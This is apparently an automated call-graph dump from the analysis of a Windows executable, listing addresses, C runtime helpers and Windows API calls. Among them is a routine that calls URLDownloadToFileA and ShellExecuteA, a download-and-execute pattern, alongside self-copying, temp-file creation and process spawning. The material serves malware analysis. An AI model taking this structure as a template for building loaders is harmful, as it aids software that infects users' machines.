14286->14287 14288 1724ca 14287->14288 14289 1724a9 14287->14289 14291 174aa1 __fassign 37 API calls 14288->14291 14288->14299 14290 174b07 __fassign 19 API calls 14289->14290 14290->14299 14292 1724f5 14291->14292 14293 17253d 14292->14293 14294 1724fb 14292->14294 14295 16ffc9 __fassign MultiByteToWideChar 14293->14295 14296 172523 14294->14296 14297 16ffc9 __fassign MultiByteToWideChar 14294->14297 14295->14296 14298 16ecd3 __dosmaperr 14 API calls 14296->14298 14296->14299 14297->14296 14298->14299 14299->14251 14301 16c7a4 14300->14301 14302 16c795 14300->14302 14304 16c79a 14301->14304 14305 1709e3 15 API calls 14301->14305 14303 16ecd3 __dosmaperr 14 API calls 14302->14303 14303->14304 14304->14270 14306 16c7cc 14305->14306 14307 16c7e3 14306->14307 14308 16caf7 14 API calls 14306->14308 14309 16ed43 _free 14 API calls 14307->14309 14308->14307 14309->14304 14311 16c727 14310->14311 14312 16c718 14310->14312 14314 16c71d 14311->14314 14315 1709e3 15 API calls 14311->14315 14313 16ecd3 __dosmaperr 14 API calls 14312->14313 14313->14314 14314->14274 14316 16c74e 14315->14316 14317 16c765 14316->14317 14318 16caf7 14 API calls 14316->14318 14319 16ed43 _free 14 API calls 14317->14319 14318->14317 14319->14314 14321 172fd0 14320->14321 14324 172fe6 14320->14324 14322 16ecd3 __dosmaperr 14 API calls 14321->14322 14323 172fd5 14322->14323 14325 16ec16 ___std_exception_copy 25 API calls 14323->14325 14324->14321 14326 172ff8 14324->14326 14335 172fdf 14325->14335 14327 173034 14326->14327 14328 173063 14326->14328 14332 172e64 25 API calls 14327->14332 14329 17308c 14328->14329 14330 173091 14328->14330 14333 1730f7 14329->14333 14334 1730b5 14329->14334 14331 172712 39 API calls 14330->14331 14331->14335 14332->14335 14338 172a21 39 API calls 14333->14338 14336 1730ba 14334->14336 14337 1730d9 14334->14337 14335->14276 14339 172d9a 39 API calls 14336->14339 14340 172c11 39 API calls 14337->14340 14338->14335 14339->14335 14340->14335 14342 163726 14341->14342 14343 16372d 14342->14343 14344 1610bf 26 API calls 14342->14344 14343->13685 14345 163745 14344->14345 14347 16354d 14346->14347 14348 1635cf 14347->14348 14351 163568 14347->14351 14349 1610bf 26 API calls 14348->14349 14350 1635dc 14349->14350 14352 163bfd 28 API calls 14351->14352 14353 163598 14351->14353 14352->14353 14353->13683 14355 1614b8 14354->14355 14358 161240 14355->14358 14359 161257 14358->14359 14360 161249 RtlFreeHeap 14358->14360 14359->13691 14360->14359 14362 16132b 40 API calls 14361->14362 14363 163674 14362->14363 14364 163afc 26 API calls 14363->14364 14365 16367c 14364->14365 14366 163696 14365->14366 14367 163477 37 API calls 14365->14367 14366->13702 14367->14366 14389 163b35 14368->14389 14370 164883 _unexpected 14371 164897 GetStartupInfoW 14370->14371 14372 1648c0 14371->14372 14373 1648ce CreateProcessW 14371->14373 14374 163bfd 28 API calls 14372->14374 14375 1648ec 14373->14375 14376 1648fd 14373->14376 14377 1648cb 14374->14377 14378 1648f3 GetLastError 14375->14378 14379 16493a 14375->14379 14380 164902 WaitForSingleObject 14376->14380 14381 16490d 14376->14381 14377->14373 14378->14379 14384 161302 RtlFreeHeap 14379->14384 14380->14381 14382 164914 GetExitCodeProcess 14381->14382 14383 164925 14381->14383 14385 164928 CloseHandle CloseHandle 14382->14385 14383->14385 14386 164942 14384->14386 14385->14379 14387 168bf5 _ValidateLocalCookies 5 API calls 14386->14387 14388 1630d1 14387->14388 14388->13707 14390 163b49 14389->14390 14391 163b9c 14390->14391 14392 163b7d 14390->14392 14396 163b5b 14390->14396 14393 163d4d 26 API calls 14391->14393 14394 163c88 14 API calls 14392->14394 14395 163ba1 14393->14395 14394->14396 14396->14370 14398 165315 RegQueryValueExW RegCloseKey 14397->14398 14401 165348 14397->14401 14398->14401 14399 168bf5 _ValidateLocalCookies 5 API calls 14400 1641d8 14399->14400 14400->13724 14401->14399 14403 16640c 14402->14403 14417 1662bf 14403->14417 14473 165442 14417->14473 14474 16132b 40 API calls 14473->14474 14475 165475 14474->14475 14476 163afc 26 API calls 14475->14476 14477 16547e 14476->14477 14478 16132b 40 API calls 14477->14478 14479 165483 14478->14479 14480 163afc 26 API calls 14479->14480 14481 16548c 14480->14481 14482 16132b 40 API calls 14481->14482 14483 165491 14482->14483 14484 163afc 26 API calls 14483->14484 14485 16549a 14484->14485 14486 16132b 40 API calls 14485->14486 14487 16549f 14486->14487 14488 163afc 26 API calls 14487->14488 14489 1654a8 14488->14489 14490 1654af GetSidLengthRequired 14489->14490 14491 16551b 14489->14491 14490->14491 14493 1654bb InitializeSid 14490->14493 14492 1610bf 26 API calls 14491->14492 14494 165525 14492->14494 14493->14494 14495 1654cd 14493->14495 14537 165373 GetLastError 14494->14537 14497 1654f5 14495->14497 14499 1654dc GetSidSubAuthority 14495->14499 14526 16561c IsValidSid 14497->14526 14499->14497 14499->14499 14501 165503 14502 168bf5 _ValidateLocalCookies 5 API calls 14501->14502 14503 165519 14502->14503 14504 1658d9 14503->14504 14546 165603 14504->14546 14506 1658ed 14514 165985 14506->14514 14549 1796fe 14506->14549 14508 165919 _unexpected 14558 165561 14508->14558 14511 165971 14512 16c27b ___std_exception_copy 14 API calls 14511->14512 14512->14514 14519 16552b 14514->14519 14515 16596d 14515->14511 14516 165993 14515->14516 14520 161302 RtlFreeHeap 14519->14520 14521 16553f 14520->14521 14522 161302 RtlFreeHeap 14521->14522 14523 16554a 14522->14523 14524 161302 RtlFreeHeap 14523->14524 14525 165555 14524->14525 14527 165631 GetLengthSid 14526->14527 14529 165656 14526->14529 14528 16563d CopySid 14527->14528 14527->14529 14531 165654 14528->14531 14532 165663 14528->14532 14530 1610bf 26 API calls 14529->14530 14533 165672 14530->14533 14531->14501 14541 16540a GetLastError 14532->14541 14543 16c27b 14533->14543 14536 165694 error_info_injector 14536->14501 14538 16537d 14537->14538 14539 1610bf 26 API calls 14538->14539 14540 16538b 14539->14540 14542 165414 14541->14542 14542->14529 14544 16ed43 _free 14 API calls 14543->14544 14545 16c293 14544->14545 14545->14536 14547 16560c IsValidSid 14546->14547 14548 165609 14546->14548 14547->14506 14548->14506 14550 179703 ___std_exception_copy 14549->14550 14551 17971d 14550->14551 14552 171752 __dosmaperr 2 API calls 14550->14552 14554 17971f 14550->14554 14551->14508 14552->14550 14553 17981f 14555 16b046 CallUnexpected RaiseException 14553->14555 14554->14553 14582 16b046 14554->14582 14556 17983c 14555->14556 14559 163b35 26 API calls 14558->14559 14560 16558b 14559->14560 14561 163b35 26 API calls 14560->14561 14562 16559a 14561->14562 14563 163b35 26 API calls 14562->14563 14564 1655a9 14563->14564 14565 16132b 40 API calls 14564->14565 14566 1655b3 14565->14566 14567 163afc 26 API calls 14566->14567 14568 1655bc 14567->14568 14569 1655ef 14568->14569 14570 165603 IsValidSid 14568->14570 14569->14511 14578 166541 14569->14578 14571 1655c9 14570->14571 14572 1655cd GetLengthSid CopySid 14571->14572 14573 1655ec 14571->14573 14572->14569 14574 1655e7 14572->14574 14575 1610bf 26 API calls 14573->14575 14576 16540a GetLastError 14574->14576 14577 165602 14575->14577 14576->14573 14579 166559 _unexpected 14578->14579 14580 166551 _unexpected 14578->14580 14579->14515 14580->14579 14581 16c27b ___std_exception_copy 14 API calls 14580->14581 14581->14579 14583 16b060 14582->14583 14584 16b08d RaiseException 14582->14584 14583->14584 14584->14553 14586 164350 14585->14586 14587 164359 WaitForSingleObject 14585->14587 14586->14587 14588 1643b0 ReleaseMutex 14587->14588 14590 164373 14587->14590 14589 1643b9 14588->14589 14590->14589 14591 164397 14590->14591 14592 164380 SetEvent WaitForSingleObject 14590->14592 14591->14589 14593 16439d GetCurrentProcess TerminateProcess 14591->14593 14592->14589 14592->14591 14593->14589 14595 1625ff 14594->14595 14596 1625f8 14594->14596 14597 16132b 40 API calls 14595->14597 14598 168bf5 _ValidateLocalCookies 5 API calls 14596->14598 14599 162609 14597->14599 14600 161acc 14598->14600 14601 163afc 26 API calls 14599->14601 14600->13768 14600->13769 14602 162612 14601->14602 14603 1636e0 28 API calls 14602->14603 14604 16261f SHGetFolderPathW 14603->14604 14605 16263a 14604->14605 14606 1626ad 14605->14606 14607 163668 52 API calls 14605->14607 14608 161302 RtlFreeHeap 14606->14608 14609 16264c 14607->14609 14608->14596 14776 163348 14609->14776 14612 162667 GetLastError 14613 162674 14612->14613 14620 16269c 14612->14620 14614 163348 28 API calls 14613->14614 14615 162681 14614->14615 14782 1624fb CreateDirectoryW 14615->14782 14616 161302 RtlFreeHeap 14616->14606 14620->14616 14622 1627d3 14621->14622 14629 1627f4 14621->14629 14959 1643c1 LoadResource 14622->14959 14624 1627db 14626 1627e1 SizeofResource 14624->14626 14624->14629 14625 168bf5 _ValidateLocalCookies 5 API calls 14627 161b20 14625->14627 14962 162b7e 14626->14962 14627->13780 14627->13787 14629->14625 14631 161f84 GetDiskFreeSpaceExW 14630->14631 14634 161f80 14630->14634 14632 161f97 14631->14632 14633 161f9d CoTaskMemFree 14631->14633 14632->14633 14633->14634 14635 168bf5 _ValidateLocalCookies 5 API calls 14634->14635 14636 161aa0 14635->14636 14636->13770 14637 161938 14636->14637 14638 163668 52 API calls 14637->14638 14639 16195d 14638->14639 14640 163a6c 28 API calls 14639->14640 14641 161973 GetCommandLineW CommandLineToArgvW 14640->14641 14642 1619b0 LocalFree 14641->14642 14644 161995 14641->14644 14643 161302 RtlFreeHeap 14642->14643 14645 1619bf 14643->14645 14644->14642 14646 168bf5 _ValidateLocalCookies 5 API calls 14645->14646 14647 1619ce 14646->14647 14647->13763 14647->13781 14649 16132b 40 API calls 14648->14649 14650 1626e8 14649->14650 14651 163afc 26 API calls 14650->14651 14652 1626f1 LoadLibraryExW 14651->14652 14653 162706 GetProcAddress 14652->14653 14654 162737 14652->14654 14653->14654 14656 162719 14653->14656 14655 1636e0 28 API calls 14654->14655 14657 162745 GetTempPathW 14655->14657 14658 1636e0 28 API calls 14656->14658 14661 162727 14657->14661 14658->14661 14659 162780 14660 161302 RtlFreeHeap 14659->14660 14662 162790 14660->14662 14661->14659 14663 1624fb 90 API calls 14661->14663 14664 168bf5 _ValidateLocalCookies 5 API calls 14662->14664 14665 162770 14663->14665 14666 161ad7 14664->14666 14665->14659 14667 1635dd 27 API calls 14665->14667 14666->13769 14666->13770 14667->14659 14669 1796fe 3 API calls 14668->14669 14670 16527e 14669->14670 14671 1643c1 2 API calls 14670->14671 14672 1652ae 14671->14672 14672->13772 14674 169110 _unexpected 14673->14674 14675 162854 GetTempFileNameW 14674->14675 14677 162871 14675->14677 14680 1628ac 14675->14680 14676 168bf5 _ValidateLocalCookies 5 API calls 14678 161b41 14676->14678 14679 1627a1 17 API calls 14677->14679 14677->14680 14678->13770 14678->13780 14679->14680 14680->14676 14685 1649bc 14681->14685 14682 1649ed 14683 168bf5 _ValidateLocalCookies 5 API calls 14682->14683 14684 164bc4 14683->14684 14684->13788 14685->14682 14999 172403 14685->14999 14688 163b35 26 API calls 14689 164a87 14688->14689 15003 164bc8 14689->15003 14696 16132b 40 API calls 14695->14696 14697 1628f9 14696->14697 14698 163afc 26 API calls 14697->14698 14699 162902 14698->14699 14700 1636e0 28 API calls 14699->14700 14701 162910 GetModuleFileNameW 14700->14701 14703 162925 14701->14703 14702 1629ba 14704 161302 RtlFreeHeap 14702->14704 14703->14702 14705 163668 52 API calls 14703->14705 14706 1629c5 14704->14706 14707 162947 14705->14707 14708 168bf5 _ValidateLocalCookies 5 API calls 14706->14708 14709 163348 28 API calls 14707->14709 14710 1629d4 14708->14710 14711 162954 Wow64DisableWow64FsRedirection 14709->14711 14710->13794 14712 162972 CopyFileW 14711->14712 14713 16296c GetLastError 14711->14713 14714 162984 14712->14714 14715 162995 14712->14715 14713->14712 14718 1629b0 14714->14718 14719 16298a Wow64RevertWow64FsRedirection 14714->14719 14716 1629a4 14715->14716 14717 16299b Wow64RevertWow64FsRedirection 14715->14717 15061 1633dc 14716->15061 14717->14716 14721 161302 RtlFreeHeap 14718->14721 14719->14718 14721->14702 14723 16179e 14722->14723 14732 16179a 14722->14732 15069 164408 14723->15069 14725 168bf5 _ValidateLocalCookies 5 API calls 14728 1617f5 14725->14728 14726 1617dc 14730 1644ae 3 API calls 14726->14730 14728->13800 14730->14732 14731 1617d2 15088 1644ae 14731->15088 14732->14725 14735 16132b 40 API calls 14734->14735 14736 161dbd 14735->14736 14737 163afc 26 API calls 14736->14737 14738 161dc9 14737->14738 14739 161684 59 API calls 14738->14739 14740 161ddf 14739->14740 14741 1634f4 41 API calls 14740->14741 14742 161dfa 14741->14742 14754 16132b 40 API calls 14753->14754 14755 161e9b 14754->14755 14756 163afc 26 API calls 14755->14756 14757 161ea4 14756->14757 14758 161684 59 API calls 14757->14758 14759 161eb7 14758->14759 14760 161ed2 14759->14760 14761 161edf 14759->14761 14777 1636e0 28 API calls 14776->14777 14778 163359 14777->14778 14779 162659 CreateDirectoryW 14778->14779 14780 1610bf 26 API calls 14778->14780 14779->14612 14779->14613 14781 1633a0 14780->14781 14783 162537 14782->14783 14784 162523 GetLastError 14782->14784 14786 163b35 26 API calls 14783->14786 14784->14783 14785 162530 14784->14785 14789 168bf5 _ValidateLocalCookies 5 API calls 14785->14789 14787 162545 14786->14787 14810 16231f 14787->14810 14791 1625d5 14789->14791 14791->14620 14804 1635dd 14791->14804 14805 1635f5 14804->14805 14806 163610 14804->14806 14805->14806 14807 163b35 26 API calls 14805->14807 14806->14620 14808 163607 14807->14808 14809 161302 RtlFreeHeap 14808->14809 14809->14806 14811 16132b 40 API calls 14810->14811 14812 162341 14811->14812 14813 163afc 26 API calls 14812->14813 14814 16234a 14813->14814 14837 163df0 14814->14837 14870 163fb7 14837->14870 14871 16409b 14870->14871 14872 163fe3 14870->14872 14960 1643d0 14959->14960 14961 1643d1 LockResource 14959->14961 14960->14624 14961->14624 14963 162bae 14962->14963 14975 162ba6 14962->14975 14976 167e6a 14963->14976 14965 168bf5 _ValidateLocalCookies 5 API calls 14967 162db2 14965->14967 14966 162bd6 14980 1796ec 14966->14980 14967->14629 14971 162c51 14972 1796ec 3 API calls 14971->14972 14971->14975 14973 162cfe 14972->14973 14973->14975 14988 167ef9 14973->14988 14975->14965 14977 167e7e 14976->14977 14978 167ecc 14977->14978 14992 162b50 14977->14992 14978->14966 14981 17972e 14980->14981 14982 1796fe 3 API calls 14981->14982 14983 162c10 14982->14983 14983->14975 14984 167cc8 14983->14984 14986 167ce9 __cftoe 14984->14986 14987 167d6f 14986->14987 14995 167a2f 14986->14995 14987->14971 14991 167f5d 14988->14991 14993 1796ec 3 API calls 14992->14993 14994 162b60 14993->14994 14994->14978 14997 167a4f 14995->14997 14996 167c5d __cftoe 14996->14986 14997->14996 14998 167434 URLDownloadToFileA URLDownloadToFileA ShellExecuteA exit LoadLibraryA 14997->14998 14998->14997 15000 17241e 14999->15000 15019 16db36 15000->15019 15004 16387a 40 API calls 15003->15004 15005 164be7 15004->15005 15006 163afc 26 API calls 15005->15006 15007 164bf0 15006->15007 15008 164c0a 15007->15008 15009 164bfc 15007->15009 15010 1638b5 30 API calls 15008->15010 15011 163477 37 API calls 15009->15011 15012 164c08 15010->15012 15011->15012 15013 163a6c 28 API calls 15012->15013 15014 164c21 15013->15014 15015 161302 RtlFreeHeap 15014->15015 15020 16d93d 25 API calls 15019->15020 15023 16db48 15020->15023 15021 16db81 15024 16ca4a __fassign 37 API calls 15021->15024 15022 16db5d 15025 16ecd3 __dosmaperr 14 API calls 15022->15025 15023->15021 15023->15022 15036 164a26 15023->15036 15029 16db8d 15024->15029 15026 16db62 15025->15026 15028 16ec16 ___std_exception_copy 25 API calls 15026->15028 15028->15036 15031 16dbbc 15029->15031 15037 16e3b8 15029->15037 15030 16dc26 15032 16e361 25 API calls 15030->15032 15031->15030 15043 16e361 15031->15043 15034 16dcec 15032->15034 15035 16ecd3 __dosmaperr 14 API calls 15034->15035 15034->15036 15035->15036 15036->14682 15036->14688 15038 16e3f5 15037->15038 15039 16e3c5 15037->15039 15056 1709bf 15038->15056 15042 16e3d4 __fassign 15039->15042 15049 1731c1 15039->15049 15042->15029 15044 16e386 15043->15044 15045 16e372 15043->15045 15044->15030 15045->15044 15046 16ecd3 __dosmaperr 14 API calls 15045->15046 15047 16e37b 15046->15047 15048 16ec16 ___std_exception_copy 25 API calls 15047->15048 15048->15044 15050 16ca4a __fassign 37 API calls 15049->15050 15052 1731de 15050->15052 15051 1731ee 15054 168bf5 _ValidateLocalCookies 5 API calls 15051->15054 15052->15051 15053 170d09 40 API calls 15052->15053 15053->15051 15055 17328a 15054->15055 15055->15042 15057 16e809 _unexpected 37 API calls 15056->15057 15058 1709ca 15057->15058 15059 1725b3 __fassign 37 API calls 15058->15059 15060 1709da 15059->15060 15060->15042 15062 1633f1 15061->15062 15068 1633fe 15061->15068 15065 163458 15062->15065 15062->15068 15063 163442 15063->14718 15064 163b35 26 API calls 15064->15063 15066 1610bf 26 API calls 15065->15066 15068->15063 15068->15064 15070 1644ae 3 API calls 15069->15070 15071 164425 CreateFileW 15070->15071 15072 164446 CreateFileMappingW 15071->15072 15073 16448a 15071->15073 15074 164494 15072->15074 15075 16445a MapViewOfFile 15072->15075 15078 168bf5 _ValidateLocalCookies 5 API calls 15073->15078 15077 1644ae 3 API calls 15074->15077 15075->15074 15076 16446f VirtualQuery 15075->15076 15076->15073 15076->15074 15077->15073 15079 1617c6 15078->15079 15079->14726 15080 1616fc 15079->15080 15081 16170f 15080->15081 15087 161757 15080->15087 15095 164564 15081->15095 15087->14731 15096 16171c 15095->15096 15097 164572 15095->15097 15096->15087 15097->15096 15162 164c72 15160->15162 15161 168bf5 _ValidateLocalCookies 5 API calls 15163 162fb4 15161->15163 15162->15161 15163->13841 15164 164cf9 15163->15164 15165 164d1a 15164->15165 15166 164d39 15164->15166 15167 163668 52 API calls 15165->15167 15168 16132b 40 API calls 15166->15168 15169 164d26 15167->15169 15170 164d47 15168->15170 15171 168bf5 _ValidateLocalCookies 5 API calls 15169->15171 15172 163afc 26 API calls 15170->15172 15173 164d35 15171->15173 15174 164d50 15172->15174 15173->13844 15175 16132b 40 API calls 15174->15175 15176 164d58 15175->15176 15177 163afc 26 API calls 15176->15177 15178 164d61 15177->15178 15206 1665f1 15178->15206 15181 1636e0 28 API calls 15184 164d83 15181->15184 15182 164dc5 __cftoe 15185 163b35 26 API calls 15182->15185 15198 164ea7 15182->15198 15183 1610bf 26 API calls 15200 164eb6 15183->15200 15184->15182 15186 164dbd 15184->15186 15187 164dca 15184->15187 15189 164e8f 15185->15189 15188 163746 RtlFreeHeap 15186->15188 15190 1636e0 28 API calls 15187->15190 15188->15182 15191 161302 RtlFreeHeap 15189->15191 15192 164de2 15190->15192 15193 164e9f 15191->15193 15194 164e3c 15192->15194 15195 164dec 15192->15195 15196 161302 RtlFreeHeap 15193->15196 15197 163c88 14 API calls 15194->15197 15195->15182 15199 164e00 15195->15199 15202 164e16 15195->15202 15196->15198 15197->15182 15198->15183 15201 16ecd3 __dosmaperr 14 API calls 15199->15201 15200->13844 15203 164e05 15201->15203 15202->15182 15204 16ecd3 __dosmaperr 14 API calls 15202->15204 15205 16ec16 ___std_exception_copy 25 API calls 15203->15205 15204->15203 15205->15182 15209 166606 15206->15209 15208 164d77 15208->15181 15212 166621 15209->15212 15210 166635 15210->15208 15211 1636e0 28 API calls 15211->15212 15212->15210 15212->15211 15213 161052 42 API calls 15212->15213 15213->15212 15215 16132b 40 API calls 15214->15215 15216 162dbf 15215->15216 15217 163afc 26 API calls 15216->15217 15218 162dc7 15217->15218 15219 163477 37 API calls 15218->15219 15220 162dd3 15219->15220 15221 163e04 15220->15221 15222 16387a 40 API calls 15221->15222 15223 163e24 15222->15223 15224 163afc 26 API calls 15223->15224 15225 163e2d 15224->15225 15226 163477 37 API calls 15225->15226 15227 163e38 15226->15227 15228 163e45 15227->15228 15229 163e4c 15227->15229 15230 1610bf 26 API calls 15228->15230 15238 163e83 GetLastError SetLastError FormatMessageW 15229->15238 15233 163e82 15230->15233 15234 161302 RtlFreeHeap 15235 163e6a 15234->15235 15236 168bf5 _ValidateLocalCookies 5 API calls 15235->15236 15237 162e2e 15236->15237 15237->13863 15239 163ecd GetLastError 15238->15239 15240 163edb SetLastError 15238->15240 15239->15240 15241 163fb1 15239->15241 15242 163f90 15240->15242 15243 163eef 15240->15243 15245 163d4d 26 API calls 15241->15245 15244 163746 RtlFreeHeap 15242->15244 15243->15242 15249 163f01 15243->15249 15246 163f97 LocalFree 15244->15246 15247 163fb6 15245->15247 15248 168bf5 _ValidateLocalCookies 5 API calls 15246->15248 15250 163e5e 15248->15250 15251 1636e0 28 API calls 15249->15251 15250->15234 15252 163f17 15251->15252 15253 163f24 15252->15253 15254 163f73 15252->15254 15256 163f37 15253->15256 15258 163f47 __cftoe 15253->15258 15259 163f4d 15253->15259 15255 163c88 14 API calls 15254->15255 15255->15258 15257 16ecd3 __dosmaperr 14 API calls 15256->15257 15260 163f3c 15257->15260 15258->15246 15259->15258 15261 16ecd3 __dosmaperr 14 API calls 15259->15261 15262 16ec16 ___std_exception_copy 25 API calls 15260->15262 15261->15260 15262->15258 15264 161d52 15263->15264 15265 161d6d 15263->15265 15266 161d89 15264->15266 15269 161d5b DeleteFileW 15264->15269 15267 1633a1 15 API calls 15265->15267 15278 1610aa RaiseException 15266->15278 15270 161d75 RemoveDirectoryW 15267->15270 15269->15264 15269->15265 15270->15266 15271 161d95 15273 161a5c 15272->15273 15274 1633ae 15272->15274 15273->13889 15275 1633c7 15274->15275 15276 161302 RtlFreeHeap 15274->15276 15277 16c27b ___std_exception_copy 14 API calls 15275->15277 15276->15274 15277->15273 15278->15271 15280 16b9d5 15279->15280 15289 16b9e6 15279->15289 15290 16ba6d GetModuleHandleW 15280->15290 15285 16ba20 15285->12855 15297 16b88d 15289->15297 15291 16b9da 15290->15291 15291->15289 15292 16bab0 GetModuleHandleExW 15291->15292 15293 16bacf GetProcAddress 15292->15293 15294 16bae4 15292->15294 15293->15294 15295 16bb01 15294->15295 15296 16baf8 FreeLibrary 15294->15296 15295->15289 15296->15295 15298 16b899 ___scrt_is_nonwritable_in_current_image 15297->15298 15313 170201 EnterCriticalSection 15298->15313 15300 16b8a3 15314 16b8da 15300->15314 15302 16b8b0 15318 16b8ce 15302->15318 15305 16ba2b 15342 170268 GetPEB 15305->15342 15308 16ba5a 15311 16bab0 _unexpected 3 API calls 15308->15311 15309 16ba3a GetPEB 15309->15308 15310 16ba4a GetCurrentProcess TerminateProcess 15309->15310 15310->15308 15312 16ba62 ExitProcess 15311->15312 15313->15300 15315 16b8e6 ___scrt_is_nonwritable_in_current_image 15314->15315 15317 16b947 _unexpected 15315->15317 15321 16bff4 15315->15321 15317->15302 15341 170251 LeaveCriticalSection 15318->15341 15320 16b8bc 15320->15285 15320->15305 15324 16bd25 15321->15324 15325 16bd31 ___scrt_is_nonwritable_in_current_image 15324->15325 15332 170201 EnterCriticalSection 15325->15332 15327 16bd3f 15333 16bf04 15327->15333 15332->15327 15334 16bd4c 15333->15334 15335 16bf23 15333->15335 15337 16bd74 15334->15337 15335->15334 15336 16ed43 _free 14 API calls 15335->15336 15336->15334 15340 170251 LeaveCriticalSection 15337->15340 15339 16bd5d 15339->15317 15340->15339 15341->15320 15343 170282 15342->15343 15344 16ba35 15342->15344 15346 17135f 15343->15346 15344->15308 15344->15309 15347 1712dc __dosmaperr 5 API calls 15346->15347 15348 17137b 15347->15348 15348->15344 15350 16c1cd ___scrt_uninitialize_crt 15349->15350 15351 16c1bb 15349->15351 15350->12955 15352 16c1c9 15351->15352 15354 171d6b 15351->15354 15352->12955 15357 171c19 15354->15357 15360 171b6d 15357->15360 15361 171b79 ___scrt_is_nonwritable_in_current_image 15360->15361 15368 170201 EnterCriticalSection 15361->15368 15363 171bef 15377 171c0d 15363->15377 15366 171b83 ___scrt_uninitialize_crt 15366->15363 15369 171ae1 15366->15369 15368->15366 15370 171aed ___scrt_is_nonwritable_in_current_image 15369->15370 15380 171e9c EnterCriticalSection 15370->15380 15372 171af7 ___scrt_uninitialize_crt 15373 171b43 15372->15373 15381 171d23 15372->15381 15391 171b61 15373->15391 15524 170251 LeaveCriticalSection 15377->15524 15379 171bfb 15379->15352 15380->15372 15382 171d30 15381->15382 15383 171d39 15381->15383 15384 171c19 ___scrt_uninitialize_crt 66 API calls 15382->15384 15394 171cbe 15383->15394 15386 171d36 15384->15386 15386->15373 15389 171d55 15407 173d78 15389->15407 15523 171eb0 LeaveCriticalSection 15391->15523 15393 171b4f 15393->15366 15395 171cd6 15394->15395 15399 171cfb 15394->15399 15396 17311c ___scrt_uninitialize_crt 25 API calls 15395->15396 15395->15399 15397 171cf4 15396->15397 15418 174570 15397->15418 15399->15386 15400 17311c 15399->15400 15401 17313d 15400->15401 15402 173128 15400->15402 15401->15389 15403 16ecd3 __dosmaperr 14 API calls 15402->15403 15404 17312d 15403->15404 15405 16ec16 ___std_exception_copy 25 API calls 15404->15405 15406 173138 15405->15406 15406->15389 15408 173d89 15407->15408 15411 173d96 15407->15411 15409 16ecd3 __dosmaperr 14 API calls 15408->15409 15413 173d8e 15409->15413 15410 173ddf 15412 16ecd3 __dosmaperr 14 API calls 15410->15412 15411->15410 15414 173dbd 15411->15414 15415 173de4 15412->15415 15413->15386 15492 173cd6 15414->15492 15417 16ec16 ___std_exception_copy 25 API calls 15415->15417 15417->15413 15419 17457c ___scrt_is_nonwritable_in_current_image 15418->15419 15420 174584 15419->15420 15421 17459c 15419->15421 15443 16ecc0 15420->15443 15422 174637 15421->15422 15427 1745ce 15421->15427 15424 16ecc0 __dosmaperr 14 API calls 15422->15424 15426 17463c 15424->15426 15429 16ecd3 __dosmaperr 14 API calls 15426->15429 15446 1703e7 EnterCriticalSection 15427->15446 15428 16ecd3 __dosmaperr 14 API calls 15431 174591 15428->15431 15432 174644 15429->15432 15431->15399 15434 16ec16 ___std_exception_copy 25 API calls 15432->15434 15433 1745d4 15435 174605 15433->15435 15436 1745f0 15433->15436 15434->15431 15447 174662 15435->15447 15437 16ecd3 __dosmaperr 14 API calls 15436->15437 15439 1745f5 15437->15439 15441 16ecc0 __dosmaperr 14 API calls 15439->15441 15440 174600 15489 17462f 15440->15489 15441->15440 15444 16e960 __dosmaperr 14 API calls 15443->15444 15445 16ecc5 15444->15445 15445->15428 15446->15433 15448 174684 15447->15448 15460 1746a0 15447->15460 15449 174688 15448->15449 15451 1746d8 15448->15451 15450 16ecc0 __dosmaperr 14 API calls 15449->15450 15452 17468d 15450->15452 15454 1768cd ___scrt_uninitialize_crt 27 API calls 15451->15454 15457 1746ee 15451->15457 15453 16ecd3 __dosmaperr 14 API calls 15452->15453 15456 174695 15453->15456 15454->15457 15455 174209 ___scrt_uninitialize_crt 38 API calls 15458 1746f7 15455->15458 15459 16ec16 ___std_exception_copy 25 API calls 15456->15459 15457->15455 15461 174735 15458->15461 15462 1746fc 15458->15462 15459->15460 15460->15440 15463 17478f WriteFile 15461->15463 15464 174749 15461->15464 15465 174722 15462->15465 15466 174700 15462->15466 15467 1747b2 GetLastError 15463->15467 15473 174718 15463->15473 15469 174751 15464->15469 15470 17477f 15464->15470 15468 173df5 ___scrt_uninitialize_crt 43 API calls 15465->15468 15471 1747fc 15466->15471 15476 1741a1 ___scrt_uninitialize_crt 6 API calls 15466->15476 15467->15473 15468->15473 15474 174756 15469->15474 15475 17476f 15469->15475 15472 17427a ___scrt_uninitialize_crt 7 API calls 15470->15472 15471->15460 15477 16ecd3 __dosmaperr 14 API calls 15471->15477 15472->15473 15473->15460 15473->15471 15480 1747d2 15473->15480 15474->15471 15481 174355 ___scrt_uninitialize_crt 7 API calls 15474->15481 15478 17443e ___scrt_uninitialize_crt 8 API calls 15475->15478 15476->15473 15479 17481d 15477->15479 15478->15473 15482 16ecc0 __dosmaperr 14 API calls 15479->15482 15483 1747f0 15480->15483 15484 1747d9 15480->15484 15481->15473 15482->15460 15486 16ec9d __dosmaperr 14 API calls 15483->15486 15485 16ecd3 __dosmaperr 14 API calls 15484->15485 15487 1747de 15485->15487 15486->15460 15488 16ecc0 __dosmaperr 14 API calls 15487->15488 15488->15460 15490 17040a ___scrt_uninitialize_crt LeaveCriticalSection 15489->15490 15491 174635 15490->15491 15491->15431 15493 173ce2 ___scrt_is_nonwritable_in_current_image 15492->15493 15506 1703e7 EnterCriticalSection 15493->15506 15495 173cf1 15496 173d38 15495->15496 15507 1704be 15495->15507 15498 16ecd3 __dosmaperr 14 API calls 15496->15498 15500 173d3d 15498->15500 15499 173d1d FlushFileBuffers 15499->15500 15501 173d29 15499->15501 15520 173d6c 15500->15520 15502 16ecc0 __dosmaperr 14 API calls 15501->15502 15504 173d2e GetLastError 15502->15504 15504->15496 15506->15495 15508 1704e0 15507->15508 15509 1704cb 15507->15509 15511 16ecc0 __dosmaperr 14 API calls 15508->15511 15514 170505 15508->15514 15510 16ecc0 __dosmaperr 14 API calls 15509->15510 15512 1704d0 15510->15512 15515 170510 15511->15515 15513 16ecd3 __dosmaperr 14 API calls 15512->15513 15516 1704d8 15513->15516 15514->15499 15517 16ecd3 __dosmaperr 14 API calls 15515->15517 15516->15499 15518 170518 15517->15518 15519 16ec16 ___std_exception_copy 25 API calls 15518->15519 15519->15516 15521 17040a ___scrt_uninitialize_crt LeaveCriticalSection 15520->15521 15522 173d55 15521->15522 15522->15413 15523->15393 15524->15379 15525 1709e3 15526 170a21 15525->15526 15531 1709f1 __dosmaperr 15525->15531 15527 16ecd3 __dosmaperr 14 API calls 15526->15527 15529 170a1f 15527->15529 15528 170a0c RtlAllocateHeap 15528->15529 15528->15531 15530 171752 __dosmaperr 2 API calls 15530->15531 15531->15526 15531->15528 